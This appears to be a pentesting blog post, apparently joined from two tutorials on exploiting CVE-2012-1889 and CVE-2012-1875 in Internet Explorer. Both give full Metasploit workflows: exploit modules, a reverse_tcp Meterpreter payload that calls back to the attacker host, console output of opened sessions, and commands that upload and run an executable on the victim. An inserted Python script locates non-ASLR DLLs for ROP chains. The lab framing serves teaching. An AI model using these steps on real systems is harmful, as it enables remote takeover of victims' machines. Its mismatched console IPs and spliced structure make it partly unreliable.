CVE-2012-1889: Microsoft XML Core Services Vulnerability

A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker has no way to force users to visit such a website; instead, the attacker has to convince them to visit it, typically by getting them to click a link in an email or instant-messenger message that leads to the attacker's site. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007; Microsoft's advisory has the full list of affected products. The vulnerability exists because MSXML attempts to access an object in memory that has not been initialized, which can corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

I am going to demonstrate how to use Metasploit to test whether the machines on your network are vulnerable.

Open the Terminal and type "msfupdate" to get the latest Metasploit modules. Once the update is finished, type "msfconsole".

Then type the following command in the console: use exploit/windows/browser/msxml_get_definition_code_exec

Now we have to know the list of settings available for this exploit module. To get the list, type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here 192.168.56.10 is the IP of the BackTrack machine. You can get this IP by simply typing "ifconfig" in the terminal.

Command: set LHOST 192.168.56.10
Details: The address the Meterpreter payload connects back to; here it is the same BackTrack IP.

Command: set URIPATH /
Details: The path at which our exploit page will be served.

As usual, we can use the reverse TCP payload for this attack too, so type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.
Once the victim loads the URL in his IE browser, you will get the following message in your Metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP
[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type "sessions" to list the active sessions. Type "sessions -i 1" to interact with the session with id '1'; this brings you to Meterpreter. Type "sysinfo" in Meterpreter to get the system information.



Hi. Today I am going to explain how to hack a Windows system using the recent IE exploit. This article is intended to educate pentesters. If you don't know what penetration testing means, please read this article first. Also please read the previous articles on pen testing.

CVE-2012-1875 : MS12-037 Internet Explorer Same ID Vulnerability
Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

Two technologies in modern operating systems make exploits of this sort harder: DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for attackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible, just trickier.

In the case of CVE-2012-1875, ASLR is bypassed by forcing Internet Explorer to find and load an old version of the Microsoft C runtime DLL, one compiled before ASLR became the norm and therefore not opted in to it. Whenever a non-ASLR DLL is loaded, even into an ASLR-enabled program, it lands at its preferred base address, so you can predict where it will end up. For this Metasploit module the old runtime is msvcr71.dll, which the Java 6 runtime installs alongside its browser plugin; that is why the module's console output below reports "Using JRE ROP", and why the target needs that Java runtime installed for this chain to work.

And DEP is bypassed using a technique known as ROP, or return-oriented programming: instead of injecting new code into a non-executable region, the exploit chains together short instruction sequences ending in "ret" that already exist in the loaded, executable DLL, and uses them to make the pages holding the payload executable (typically via VirtualProtect()) before jumping to it.
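To make the ASLR point concrete, here is an added example that is not part of the original post or of the Metasploit module: a plain Python script that reads the PE header bits the Windows loader uses to decide whether a module may be randomised, and reports the preferred base for modules that cannot be. That base is the address a ROP chain against a non-ASLR DLL is built on. The sample images it checks are constructed inside the script with made-up field values, and the function and constant names are mine. One caveat: a missing DYNAMIC_BASE flag means the loader will not randomise the module on its own, but the module can still be relocated if its preferred range is already occupied, and system-wide mandatory ASLR on newer Windows versions can force a relocation, so confirm the actual load address on the target before relying on it.

```python
"""Check whether a PE module (EXE/DLL) opts in to ASLR and DEP.

The Windows loader honours two bits in IMAGE_OPTIONAL_HEADER.DllCharacteristics:
DYNAMIC_BASE (the module may be rebased, i.e. ASLR) and NX_COMPAT (the module is
DEP-compatible).  A DLL built before those flags existed has neither and is
mapped at its preferred ImageBase on every run (unless that range is already
taken), which is the property an ASLR-bypassing ROP chain relies on.
"""
import struct
import sys

# DllCharacteristics bits from the PE/COFF specification
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high entropy
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040     # module may be rebased (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100        # module is DEP-compatible
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def pe_mitigations(data):
    """Parse the DOS/PE/optional headers of `data` and report the mitigation
    opt-ins plus the preferred ImageBase."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20  # skip "PE\0\0" and the 20-byte COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]  # 8-byte base, no BaseOfData
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # From SectionAlignment onward PE32 and PE32+ share one layout, so
    # DllCharacteristics sits at offset 70 in both.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "image_base": image_base,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
    }


def verdict(name, data):
    """One-line summary: a module without DYNAMIC_BASE is a gadget source at a
    predictable address."""
    m = pe_mitigations(data)
    aslr = "ASLR" if m["aslr"] else "NO ASLR (predictable base 0x%x)" % m["image_base"]
    dep = "DEP" if m["dep"] else "NO DEP"
    return "%s: %s, %s" % (name, aslr, dep)


def build_test_pe(image_base, dll_chars, pe32plus=False):
    """Construct a minimal header-only PE image (not a loadable DLL) so the
    parser can be exercised offline; every field value here is made up."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,  # Machine
                       0, 0, 0, 0,                     # sections, timestamp, symtab ptr, nsyms
                       opt_size, 0x2002)               # SizeOfOptionalHeader, DLL|EXECUTABLE_IMAGE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:  # e.g. DLLs copied out of the target VM
            with open(path, "rb") as fh:
                print(verdict(path, fh.read()))
    else:
        # Constructed samples: a pre-ASLR runtime lookalike and a modern DLL.
        print(verdict("legacy_crt.dll (constructed)", build_test_pe(0x10000000, 0x0000)))
        print(verdict("modern.dll (constructed)", build_test_pe(0x10000000, 0x0140)))
```

Run it with no arguments to see the two constructed samples, or pass paths to DLLs copied from the target (for example the C runtime shipped with the Java plugin) to see which modules in the browser's address space are usable as a fixed gadget source.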

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875):


Requirements:
  • Target OS: Windows XP SP3 with Internet Explorer 8 (the module's "JRE ROP" chain also expects the Java 6 runtime on the target, which is where the non-ASLR msvcr71.dll comes from)
  • Attacker OS: BackTrack or any pentesting distro
As usual, you have to create two VMs in VirtualBox.

Preparing victim system:
Install Windows XP SP3 in one of the VMs and change that VM's network adapter to the host-only adapter. (If you don't know what I am talking about, please use the VirtualBox manual.)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in the Terminal:
msfupdate

Or download the 'ms12_037_same_id.rb' module and copy it into the directory "/opt/metasploit/msf3/modules/exploits/windows/browser/".

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type "use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. To get the list, type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here 192.168.56.10 is the IP of the BackTrack machine. You can get this IP by simply typing "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path at which our exploit page will be served.

As usual, we can use the reverse TCP payload for this attack too. Type the following commands in the Metasploit console (LHOST is the address the Meterpreter session connects back to, here the same BackTrack IP; without it the reverse_tcp payload cannot start its listener):
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.10

Ok, let us launch the exploit.

Type "exploit" in the console.


The exploit is now running, and the module serves its page at "http://192.168.56.10:8080/".

Once the victim loads that URL in his IE browser, you will get the following messages in your Metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)

Type "sessions" to list the active sessions. Type "sessions -i 1" to interact with the session with id '1'; this brings you to Meterpreter.

Now you can control the victim system from your machine using Meterpreter.

For example:

"upload /Test.exe c:\\" uploads Test.exe from the root ('file system') folder of the BT5 machine to the C drive of the target (the doubled backslash is needed because Meterpreter treats a single backslash as an escape character).

"execute -f C:\\Test.exe" runs our uploaded file on the target.

Please leave a comment if I have done well, or once you have finished learning from the blog.